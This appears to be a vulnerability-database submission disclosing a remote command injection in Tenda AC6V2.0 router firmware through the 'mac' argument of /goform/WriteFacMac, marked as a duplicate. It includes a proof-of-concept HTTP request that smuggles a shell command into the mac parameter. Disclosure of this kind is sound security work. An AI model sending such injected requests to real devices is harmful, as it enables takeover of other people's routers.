| Title | Tenda AC6V2.0 Tenda AC6V2.0 V15.03.06.23_multi Command Injection |
|---|
| Description | A vulnerability was determined in Tenda AC6V2.0 V15.03.06.23_multi. This impacts the function formWriteFacMac of the file httpd. This manipulation of the argument mac causes command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.
poc:
GET /goform/WriteFacMac?mac=;ps>axelioc HTTP/1.1
Host: 192.168.0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.3/main.html
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: password=yzccvb
Connection: close
|
|---|
| Source | ⚠️ https://github.com/Axelioc/CVE/blob/main/Tenda/AC6V2.0/formWriteFacMac.md |
|---|
| User | Haaalion (UID 89556) |
|---|
| Submission | 05/31/2026 14:41 (29 days ago) |
|---|
| Moderation | 06/28/2026 20:20 (28 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 282865 [Tenda AC6 15.03.05.19 API Endpoint /goform/WriteFacMac formWriteFacMac mac command injection] |
|---|
| Points | 0 |
|---|